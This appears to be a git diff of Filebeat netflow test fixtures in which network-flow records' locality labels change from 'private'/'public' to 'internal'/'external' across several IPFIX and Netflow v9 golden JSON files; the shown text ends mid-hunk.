a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json index c52420347bc9..dc8f538dfee7 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "172.18.65.211", - "locality": "private", + "locality": "internal", "port": 5985 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "-Sv1di8xiKE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.18.65.211", @@ -76,7 +76,7 @@ "source": { "bytes": 100, "ip": "172.18.65.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61209 } @@ -90,7 +90,7 @@ "Fields": { "destination": { "ip": "172.18.65.255", - "locality": "private", + "locality": "internal", "port": 138 }, "event": { @@ -106,7 +106,7 @@ }, "flow": { "id": "OQCLJ5IN83c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.18.65.255", @@ -159,7 +159,7 @@ "source": { "bytes": 229, "ip": "172.18.65.91", - "locality": "private", + "locality": "internal", "packets": 1, "port": 138 } @@ -173,7 +173,7 @@ "Fields": { "destination": { "ip": "172.18.65.255", - "locality": "private", + "locality": "internal", "port": 138 }, "event": { @@ -189,7 +189,7 @@ }, "flow": { "id": "OQCLJ5IN83c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.18.65.255", @@ -242,7 +242,7 @@ "source": { "bytes": 229, "ip": "172.18.65.91", - "locality": "private", + "locality": "internal", "packets": 1, "port": 138 } @@ -256,7 +256,7 @@ "Fields": { "destination": { "ip": "224.0.0.252", - "locality": "private", + "locality": "internal", "port": 5355 }, "event": { @@ -272,7 +272,7 @@ }, "flow": { "id": "xcyYrM-QBl0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "224.0.0.252", @@ -325,7 +325,7 @@ "source": { "bytes": 104, "ip": "172.18.65.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61329 } @@ -353,7 +353,7 @@ }, "flow": { "id": "y_Vml2vPNtw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "ff02::1:3", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json index 1a3667d0659e..5b2b4b01ac3b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json @@ -8,7 +8,7 @@ "destination": { "bytes": 200, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 2, "port": 53 }, @@ -25,7 +25,7 @@ }, "flow": { "id": "QMH_S2K9KdI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -77,7 +77,7 @@ "source": { "bytes": 132, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 2, "port": 46086 } @@ -92,7 +92,7 @@ "destination": { "bytes": 92, "ip": "172.16.32.215", - "locality": "private", + "locality": "internal", "packets": 2, "port": 9997 }, @@ -109,7 +109,7 @@ }, "flow": { "id": "YlvEOsG0NHc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.215", @@ -167,7 +167,7 @@ "source": { "bytes": 172, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 4, "port": 63499 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json index f996dac4c96f..0c2dbd22d5e8 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -94,7 +94,7 @@ "source": { "bytes": 40, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 51053 } @@ -108,7 +108,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 51053 }, "event": { @@ -124,7 +124,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -183,7 +183,7 @@ "source": { "bytes": 1525, "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } @@ -197,7 +197,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -213,7 +213,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -284,7 +284,7 @@ "source": { "bytes": 1541, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 51053 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json index 9e949af09f4e..72c0db6a7904 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "172.16.21.27", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "dO-Anbp9xpw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.21.27", @@ -79,7 +79,7 @@ "source": { "bytes": 775, "ip": "10.113.7.54", - "locality": "private", + "locality": "internal", "packets": 8, "port": 41717 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json index cbab38ddc971..72dd4072ef9e 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json @@ -45,7 +45,7 @@ "Fields": { "destination": { "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -61,7 +61,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.128", @@ -109,7 +109,7 @@ "source": { "bytes": 260, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 5, "port": 60560 } @@ -123,7 +123,7 @@ "Fields": { "destination": { "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "port": 60560 }, "event": { @@ -139,7 +139,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.1", @@ -187,7 +187,7 @@ "source": { "bytes": 1000, "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "packets": 6, "port": 22 } @@ -201,7 +201,7 @@ "Fields": { "destination": { "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "port": 35262 }, "event": { @@ -217,7 +217,7 @@ }, "flow": { "id": "ztL93_3GZNs", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.132", @@ -265,7 +265,7 @@ "source": { "bytes": 601, "ip": "192.168.253.2", - "locality": "private", + "locality": "internal", "packets": 2, "port": 53 } @@ -279,7 +279,7 @@ "Fields": { "destination": { "ip": "192.168.253.2", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -295,7 +295,7 @@ }, "flow": { "id": "ztL93_3GZNs", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.2", @@ -343,7 +343,7 @@ "source": { "bytes": 148, "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "packets": 2, "port": 35262 } @@ -357,7 +357,7 @@ "Fields": { "destination": { "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "port": 49935 }, "event": { @@ -373,7 +373,7 @@ }, "flow": { "id": "VANFUe1rklc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.253.132", @@ -421,7 +421,7 @@ "source": { "bytes": 5946, "ip": "54.214.9.161", - "locality": "public", + "locality": "external", "packets": 14, "port": 443 } @@ -435,7 +435,7 @@ "Fields": { "destination": { "ip": "54.214.9.161", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -451,7 +451,7 @@ }, "flow": { "id": "VANFUe1rklc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "54.214.9.161", @@ -499,7 +499,7 @@ "source": { "bytes": 2608, "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "packets": 13, "port": 49935 } @@ -513,7 +513,7 @@ "Fields": { "destination": { "ip": "10.4.36.64", - "locality": "private", + "locality": "internal", "port": 9200 }, "event": { @@ -529,7 +529,7 @@ }, "flow": { "id": "iDHwMSG6faQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.4.36.64", @@ -577,7 +577,7 @@ "source": { "bytes": 60, "ip": "192.168.253.130", - "locality": "private", + "locality": "internal", "packets": 1, "port": 38254 } @@ -591,7 +591,7 @@ "Fields": { "destination": { "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -607,7 +607,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.128", @@ -655,7 +655,7 @@ "source": { "bytes": 256, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 4, "port": 60560 } @@ -669,7 +669,7 @@ "Fields": { "destination": { "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "port": 60560 }, "event": { @@ -685,7 +685,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.1", @@ -733,7 +733,7 @@ "source": { "bytes": 1916, "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "packets": 3, "port": 22 } @@ -747,7 +747,7 @@ "Fields": { "destination": { "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -763,7 +763,7 @@ }, "flow": { "id": "WgPN9s2D0jg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.128", @@ -811,7 +811,7 @@ "source": { "bytes": 168, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 65308 } @@ -825,7 +825,7 @@ "Fields": { "destination": { "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "port": 65308 }, "event": { @@ -841,7 +841,7 @@ }, "flow": { "id": "WgPN9s2D0jg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.1", @@ -889,7 +889,7 @@ "source": { "bytes": 84, "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "packets": 1, "port": 22 } @@ -903,7 +903,7 @@ "Fields": { "destination": { "ip": "224.0.0.251", - "locality": "private", + "locality": "internal", "port": 5353 }, "event": { @@ -919,7 +919,7 @@ }, "flow": { "id": "PSMPOofjjVU", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "224.0.0.251", @@ -967,7 +967,7 @@ "source": { "bytes": 232, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 5353 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json index baf08b855fa9..448709e5c419 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "62.217.193.1", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "BPlkuHwo9sU", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -70,7 +70,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 37301 @@ -85,7 +85,7 @@ "Fields": { "destination": { "ip": "62.217.193.65", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -101,7 +101,7 @@ }, "flow": { "id": "-PhJhHv5gvE", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -148,7 +148,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 58411 @@ -163,7 +163,7 @@ "Fields": { "destination": { "ip": "62.217.193.1", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -179,7 +179,7 @@ }, "flow": { "id": "zTrEnrxMnjo", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -226,7 +226,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 37661 @@ -241,7 +241,7 @@ "Fields": { "destination": { "ip": "62.217.193.65", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -257,7 +257,7 @@ }, "flow": { "id": "G4AVpSxBAVo", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -304,7 +304,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 60212 @@ -319,7 +319,7 @@ "Fields": { "destination": { "ip": "192.168.3.142", - "locality": "private", + "locality": "internal", "port": 37450 }, "event": { @@ -335,7 +335,7 @@ }, "flow": { "id": "2nQmjOOzSH0", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -382,7 +382,7 @@ "source": { "bytes": 964, "ip": "158.85.58.115", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 10, "port": 5222 @@ -397,7 +397,7 @@ "Fields": { "destination": { "ip": "216.58.212.195", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -413,7 +413,7 @@ }, "flow": { "id": "z7uHiA5SrD0", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAQg==", @@ -460,7 +460,7 @@ "source": { "bytes": 2748, "ip": "192.168.0.88", - "locality": "private", + "locality": "internal", "mac": "a4:d1:8c:e9:30:2c", "packets": 8, "port": 61490 @@ -475,7 +475,7 @@ "Fields": { "destination": { "ip": "192.168.0.88", - "locality": "private", + "locality": "internal", "port": 61490 }, "event": { @@ -491,7 +491,7 @@ }, "flow": { "id": "z7uHiA5SrD0", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -538,7 +538,7 @@ "source": { "bytes": 2023, "ip": "216.58.212.195", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 9, "port": 443 @@ -553,7 +553,7 @@ "Fields": { "destination": { "ip": "216.58.201.106", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -569,7 +569,7 @@ }, "flow": { "id": "eyNcUtWu34I", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -616,7 +616,7 @@ "source": { "bytes": 2180, "ip": "192.168.1.201", - "locality": "private", + "locality": "internal", "mac": "98:01:a7:9f:8d:5f", "packets": 9, "port": 50299 @@ -631,7 +631,7 @@ "Fields": { "destination": { "ip": "192.168.1.201", - "locality": "private", + "locality": "internal", "port": 50299 }, "event": { @@ -647,7 +647,7 @@ }, "flow": { "id": "eyNcUtWu34I", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -694,7 +694,7 @@ "source": { "bytes": 700, "ip": "216.58.201.106", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 9, "port": 443 @@ -709,7 +709,7 @@ "Fields": { "destination": { "ip": "192.168.2.118", - "locality": "private", + "locality": "internal", "port": 61353 }, "event": { @@ -725,7 +725,7 @@ }, "flow": { "id": "i7e4W23LBGg", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -772,7 +772,7 @@ "source": { "bytes": 161, "ip": "52.236.33.163", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 2, "port": 443 @@ -787,7 +787,7 @@ "Fields": { "destination": { "ip": "52.216.130.237", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -803,7 +803,7 @@ }, "flow": { "id": "ALOJ32qLh_s", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -850,7 +850,7 @@ "source": { "bytes": 1764, "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "mac": "1c:5c:f2:07:0f:2a", "packets": 21, "port": 61674 @@ -865,7 +865,7 @@ "Fields": { "destination": { "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "port": 61672 }, "event": { @@ -881,7 +881,7 @@ }, "flow": { "id": "h9s7TXaoMZw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -928,7 +928,7 @@ "source": { "bytes": 13811, "ip": "209.197.3.19", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 30, "port": 443 @@ -943,7 +943,7 @@ "Fields": { "destination": { "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "port": 61674 }, "event": { @@ -959,7 +959,7 @@ }, "flow": { "id": "ALOJ32qLh_s", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1006,7 +1006,7 @@ "source": { "bytes": 4717, "ip": "52.216.130.237", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 16, "port": 443 @@ -1021,7 +1021,7 @@ "Fields": { "destination": { "ip": "172.217.23.232", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1037,7 +1037,7 @@ }, "flow": { "id": "2GPS5gJiF8g", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1084,7 +1084,7 @@ "source": { "bytes": 2419, "ip": "192.168.0.157", - "locality": "private", + "locality": "internal", "mac": "b0:34:95:0d:d2:5d", "packets": 13, "port": 51209 @@ -1099,7 +1099,7 @@ "Fields": { "destination": { "ip": "192.168.0.157", - "locality": "private", + "locality": "internal", "port": 51209 }, "event": { @@ -1115,7 +1115,7 @@ }, "flow": { "id": "2GPS5gJiF8g", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1162,7 +1162,7 @@ "source": { "bytes": 5551, "ip": "172.217.23.232", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 10, "port": 443 @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "192.168.3.178", - "locality": "private", + "locality": "internal", "port": 45584 }, "event": { @@ -1193,7 +1193,7 @@ }, "flow": { "id": "ughO0a0lrBw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1240,7 +1240,7 @@ "source": { "bytes": 187, "ip": "107.21.232.174", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 3, "port": 443 @@ -1255,7 +1255,7 @@ "Fields": { "destination": { "ip": "107.21.232.174", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1271,7 +1271,7 @@ }, "flow": { "id": "ughO0a0lrBw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1318,7 +1318,7 @@ "source": { "bytes": 104, "ip": "192.168.3.178", - "locality": "private", + "locality": "internal", "mac": "dc:ef:ca:4c:da:57", "packets": 2, "port": 45584 @@ -1333,7 +1333,7 @@ "Fields": { "destination": { "ip": "95.0.145.242", - "locality": "public", + "locality": "external", "port": 2222 }, "event": { @@ -1349,7 +1349,7 @@ }, "flow": { "id": "Ie4W_7Snl8w", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -1396,7 +1396,7 @@ "source": { "bytes": 4050, "ip": "192.168.2.118", - "locality": "private", + "locality": "internal", "mac": "70:18:8b:5c:c9:b5", "packets": 72, "port": 64233 @@ -1411,7 +1411,7 @@ "Fields": { "destination": { "ip": "192.168.2.118", - "locality": "private", + "locality": "internal", "port": 64233 }, "event": { @@ -1427,7 +1427,7 @@ }, "flow": { "id": "Ie4W_7Snl8w", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -1474,7 +1474,7 @@ "source": { "bytes": 3719, "ip": "95.0.145.242", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 72, "port": 2222 @@ -1489,7 +1489,7 @@ "Fields": { "destination": { "ip": "23.5.100.66", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1505,7 +1505,7 @@ }, "flow": { "id": "yokq763qB0U", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1552,7 +1552,7 @@ "source": { "bytes": 1402, "ip": "192.168.0.79", - "locality": "private", + "locality": "internal", "mac": "8c:29:37:7a:28:c0", "packets": 16, "port": 54275 @@ -1567,7 +1567,7 @@ "Fields": { "destination": { "ip": "23.5.100.66", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1583,7 +1583,7 @@ }, "flow": { "id": "DCY-5ocv9ik", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1630,7 +1630,7 @@ "source": { "bytes": 1538, "ip": "192.168.0.79", - "locality": "private", + "locality": "internal", "mac": "8c:29:37:7a:28:c0", "packets": 17, "port": 54276 @@ -1645,7 +1645,7 @@ "Fields": { "destination": { "ip": "192.168.0.79", - "locality": "private", + "locality": "internal", "port": 54276 }, "event": { @@ -1661,7 +1661,7 @@ }, "flow": { "id": "DCY-5ocv9ik", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1708,7 +1708,7 @@ "source": { "bytes": 13002, "ip": "23.5.100.66", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 14, "port": 443 @@ -1723,7 +1723,7 @@ "Fields": { "destination": { "ip": "192.168.0.61", - "locality": "private", + "locality": "internal", "port": 57007 }, "event": { @@ -1739,7 +1739,7 @@ }, "flow": { "id": "B7rjR_940zU", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1786,7 +1786,7 @@ "source": { "bytes": 1194, "ip": "170.251.180.15", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 4, "port": 443 @@ -1801,7 +1801,7 @@ "Fields": { "destination": { "ip": "170.251.180.15", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1817,7 +1817,7 @@ }, "flow": { "id": "B7rjR_940zU", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1864,7 +1864,7 @@ "source": { "bytes": 682, "ip": "192.168.0.61", - "locality": "private", + "locality": "internal", "mac": "90:61:ae:76:e5:e9", "packets": 2, "port": 57007 @@ -1879,7 +1879,7 @@ "Fields": { "destination": { "ip": "74.119.119.84", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1895,7 +1895,7 @@ }, "flow": { "id": "0RrmR_QtH34", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1942,7 +1942,7 @@ "source": { "bytes": 1804, "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "mac": "1c:5c:f2:07:0f:2a", "packets": 11, "port": 61694 @@ -1957,7 +1957,7 @@ "Fields": { "destination": { "ip": "192.168.3.142", - "locality": "private", + "locality": "internal", "port": 59459 }, "event": { @@ -1973,7 +1973,7 @@ }, "flow": { "id": "O1-Y9rjVH2A", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -2020,7 +2020,7 @@ "source": { "bytes": 4774, "ip": "185.60.218.19", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 9, "port": 443 @@ -2035,7 +2035,7 @@ "Fields": { "destination": { "ip": "185.60.218.15", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -2051,7 +2051,7 @@ }, "flow": { "id": "CtFBGbTcLpg", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -2098,7 +2098,7 @@ "source": { "bytes": 135, "ip": "192.168.3.200", - "locality": "private", + "locality": "internal", "mac": "18:20:32:bb:1d:62", "packets": 2, "port": 64493 @@ -2113,7 +2113,7 @@ "Fields": { "destination": { "ip": "192.168.3.200", - "locality": "private", + "locality": "internal", "port": 64493 }, "event": { @@ -2129,7 +2129,7 @@ }, "flow": { "id": "CtFBGbTcLpg", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -2176,7 +2176,7 @@ "source": { "bytes": 135, "ip": "185.60.218.15", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 2, "port": 443 @@ -2191,7 +2191,7 @@ "Fields": { "destination": { "ip": "169.45.214.246", - "locality": "public", + "locality": "external", "port": 5222 }, "event": { @@ -2207,7 +2207,7 @@ }, "flow": { "id": "lT_guTKc7y4", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -2254,7 +2254,7 @@ "source": { "bytes": 194, "ip": "192.168.0.95", - "locality": "private", + "locality": "internal", "mac": "a0:39:f7:4d:49:d5", "packets": 3, "port": 35053 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json index 5e8efb3e6268..24970903c84d 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json @@ -8,7 +8,7 @@ "destination": { "bytes": 763, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -24,7 +24,7 @@ }, "flow": { "id": "UTkRrDbrhnI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -75,7 +75,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61775 } }, @@ -89,7 +89,7 @@ "destination": { "bytes": 6207, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -105,7 +105,7 @@ }, "flow": { "id": "WQVc0v7217I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -156,7 +156,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61776 } }, @@ -170,7 +170,7 @@ "destination": { "bytes": 6207, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -186,7 +186,7 @@ }, "flow": { "id": "WQVc0v7217I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -237,7 +237,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61776 } }, @@ -251,7 +251,7 @@ "destination": { "bytes": 9075, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -267,7 +267,7 @@ }, "flow": { "id": "Nle5z0FLBjA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -318,7 +318,7 @@ "source": { "bytes": 81, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56635 } }, @@ -332,7 +332,7 @@ "destination": { "bytes": 9075, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -348,7 +348,7 @@ }, "flow": { "id": "Nle5z0FLBjA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -399,7 +399,7 @@ "source": { "bytes": 81, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56635 } }, @@ -413,7 +413,7 @@ "destination": { "bytes": 5536, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -429,7 +429,7 @@ }, "flow": { "id": "lfYzCmoZgqo", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -480,7 +480,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61773 } }, @@ -494,7 +494,7 @@ "destination": { "bytes": 5536, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -510,7 +510,7 